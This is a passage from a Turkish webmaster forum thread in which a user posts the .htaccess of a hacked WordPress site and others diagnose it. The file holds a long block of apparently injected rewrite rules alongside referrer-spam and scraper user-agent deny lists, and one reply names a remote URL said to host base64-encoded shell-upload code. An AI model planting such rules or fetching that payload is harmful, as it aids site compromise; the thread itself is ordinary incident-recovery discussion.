  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-[0-9]+..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*..*%[0-9]+F.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*..*%[0-9]+F.*-.*-.*-.*-.*-.*[0-9]+.*[0-9]+.*-.*[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+).*-.*-.*-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*(.*)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-O.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-[0-9]+-.*(.*)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*S.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-F.*(.*)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-%([0-9]+)[0-9]+%([^\d\/]+)[0-9]+-.*-.*-.*-KH.*..*$ ?$5$4=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-[0-9]+-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*TP..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*S..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-YGS..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-J.*(.*)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-[0-9]+-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-[0-9]+-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*-.*-[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*..*%[0-9]+F.*-.*-.*[0-9]+&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+).*-.*-.*-.*-.*-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-[0-9]+-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*[0-9]+-[0-9]+-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*-.*-.*-[0-9]+&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F[0-9]+_[0-9]+_[0-9]+_.*-[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-.*-.*-.*G.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*-QZ.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-[0-9]+-.*-.*-O.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-Y.*V..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+).*-.*-.*-.*-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+-.*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-[0-9]+-.*-.*-.*Q.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-[0-9]+-.*-.*-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*[0-9]+&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*..*%[0-9]+F.*_.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+_[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-T.*U..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+-.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*[0-9]+-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*-.*S..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F[0-9]+-.*-[0-9]+-.*-.*..*%[0-9]+F.*-.*-[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F[0-9]+_[0-9]+_[0-9]+_.*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*..*%[0-9]+F.*_.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+_[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+-.*-.*-[0-9]+-.*-.*-.*\/.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-([^\d\/]+).*..*$ ?$4$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-[0-9]+-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-[0-9]+-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*(.*).*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-[0-9]+-.*-.*-.*-.*M..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+-.*-.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*F.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F[0-9]+-.*-[0-9]+-.*-.*..*%[0-9]+F.*-.*-[0-9]+&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*..*%[0-9]+F.*_.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+_[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-[0-9]+-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*..*%[0-9]+F.*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F[0-9]+_[0-9]+_[0-9]+_.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*..*%[0-9]+F.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*-[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*-.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*-.*..*%[0-9]+F.*%[0-9]+F[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-.*-.*-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+..*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-[0-9]+-[0-9]+-.*-.*-[0-9]+-.*-.*-.*$ ?$1$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)(.*)%[0-9]+F%[0-9]+F.*..*..*%[0-9]+F.*-.*-.*-.*..*&.*=.*$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)$ ?$2$1=$3&%{QUERY_STRING}[L]
  RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%([^\d\/]+)([0-9]+).*%([0-9]+)[0-9]+%([^\d\/]+)([0-9]+)-.*..*$ ?$7$8=$3&%{QUERY_STRING}[L]
  RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*-.*-.*-.*([^\d\/]+)..*$ ?$4$3=$2&%{QUERY_STRING}[L]
  RewriteRule ^(.*)\/([^\d\/]+)\/([0-9]+)\/([0-9]+)\/.*\/.*\/.*\/.*..*$ ?$2$3=$4&%{QUERY_STRING}[L]
  <IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*hulfingtonpost\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*apanews\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*adcash\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*aliexpress\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*bestwebsitesawards\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*buttons-for-website\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*bycontext\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*cenokos\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*cenoval\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*cityadspix\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*darodar\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*econom\.co [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*edakgfvwql\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*gobongo\.info [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*ilovevitaly\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*ilovevitaly\.info [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*ilovevitaly\.org [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*ilovevitaly\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*iskalko\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*jollygame\.net [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*luxup\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*max-start\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*o-o-6-o-o\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*o-o-8-o-o\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*priceg\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*savetubevideo\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*screentoolkit\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*semalt\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*seoexperimenty\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*slftsdybbg\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*socialseet\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*superiends\.org [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*vodkoved\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*websites-reviews\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*websocial\.me [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*ykecwqlixx\.ru [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*simpleshare-buttons\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*simple-share-buttons\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*site1.simple-share-buttons\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*site2.simple-share-buttons\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*site3.simple-share-buttons\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*site4.simple-share-buttons\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*site5.simple-share-buttons\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*site6.simple-share-buttons\.com [NC]
  RewriteCond %{HTTP_REFERER} ^https?://([^.]+\.)*site7.simple-share-buttons\.com [NC]
  RewriteRule ^.* - [F,L]
  </IfModule>
  RewriteEngine On
  RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
  RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
  RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
  RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
  RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
  RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
  RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
  RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
  RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
  RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
  RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
  RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
  RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
  RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
  RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
  RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
  RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
  RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
  RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
  RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
  RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
  RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
  RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
  RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
  RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
  RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
  RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
  RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
  RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
  RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
  RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
  RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
  RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
  RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
  RewriteCond %{HTTP_USER_AGENT} ^Zeus
  RewriteRule .* - [f]
  SetEnvIfNoCase Referer hulfingtonpost.com spammer=yes
  SetEnvIfNoCase Referer apanews.com spammer=yes
  SetEnvIfNoCase Referer adcash.com spammer=yes
  SetEnvIfNoCase Referer aliexpress.com spammer=yes
  SetEnvIfNoCase Referer bestwebsitesawards.com spammer=yes
  SetEnvIfNoCase Referer buttons-for-website.com spammer=yes
  SetEnvIfNoCase Referer semalt.com spammer=yes
  SetEnvIfNoCase Referer bycontext.com spammer=yes
  SetEnvIfNoCase Referer cenokos.ru spammer=yes
  SetEnvIfNoCase Referer cenoval.ru spammer=yes
  SetEnvIfNoCase Referer cityadspix.ru spammer=yes
  SetEnvIfNoCase Referer darodar.com spammer=yes
  SetEnvIfNoCase Referer econom.co spammer=yes
  
  Order allow,deny
  Allow from all
  Deny from env=spammer

  Uğur www.kalitelist.com

 • Sponsor Reklam
 • 27-04-2017, 01:27:34
  #2
  1/2
  http://yakaladimsizi.com/x.txt bu link base64 ile kodlanmış. Çözüldüğünde ise upload etmek için bir kod. Yani uzaktan sitene shell upload edip, hacklink vırt zırt işlerinde kullanıyorlar. FTP yedeğini çek bir tarat büyük ihtimal ile shell çıkacaktır. Çıkmazsa bile hosting firmanı değiştir yarın öbürgün yine musallat olurlar.
  Paypal İşlemleri | Sanal Kart (VCC) İşlemleriniz Özenle Yapılır
 • 27-04-2017, 01:43:56
  #3
  1/2
  tema nulled ise de yapabiliyor
 • 27-04-2017, 01:51:50
  #4
  1/2
  LazraiL adlı üyeden alıntı
  tema nulled ise de yapabiliyor
  Yok hocam, firmanın kendi dağıttığı ücretsiz versiyonu.

  Uğur www.kalitelist.com

 • 29-04-2017, 11:24:13
  #5
  1/2
  Arkadaşlar, bunu bir türlü bulamadım.
  Google bu şekilde görüyor sayfayı.
  Çince ve garip çıkışlar var.

  Uğur www.kalitelist.com

 • 29-04-2017, 23:20:14
  #6
  1/2
  Çözemiyicek birşey yok temadan kaynaklı ftp de bulunan tüm dosyaları silip yeniden kurulum yapın bence sql yedeğinizi alın arama yapın base64 ile şifrelenmiş birşey olabilir burayıda inceleyin https://okandiyebiri.com/ucretsiz-temalara-dikkat/ ücretsiz tema kurucaksanız da buradan indirip kurun https://tr.wordpress.org/themes/
 • 30-04-2017, 16:09:41
  #7
  1/2
  http://www.r10.net/1072417031-post17.html

  Son zamanalrın populer saçmalığı. Benımde başıma geldi.
  Kurulu olduğun Makinalar YANSIN google Efendi..
 • 01-05-2017, 00:08:47
  #8
  1/2
  MimariuS adlı üyeden alıntı
  http://www.r10.net/1072417031-post17.html

  Son zamanalrın populer saçmalığı. Benımde başıma geldi.
  Hocam tüm wp dosyalarını sildim, yeniden attım ftp ye - config ayarlarını yaptım ama hata alıyorum.

  Görünün o ki WordPress’i çoktan yüklemişsiniz. Tekrar yüklemek için lütfen ilk önce eski veritabanı tablolarınızı temizleyin.

  Uğur www.kalitelist.com

 • 01-05-2017, 00:48:27
  #9
  1/2
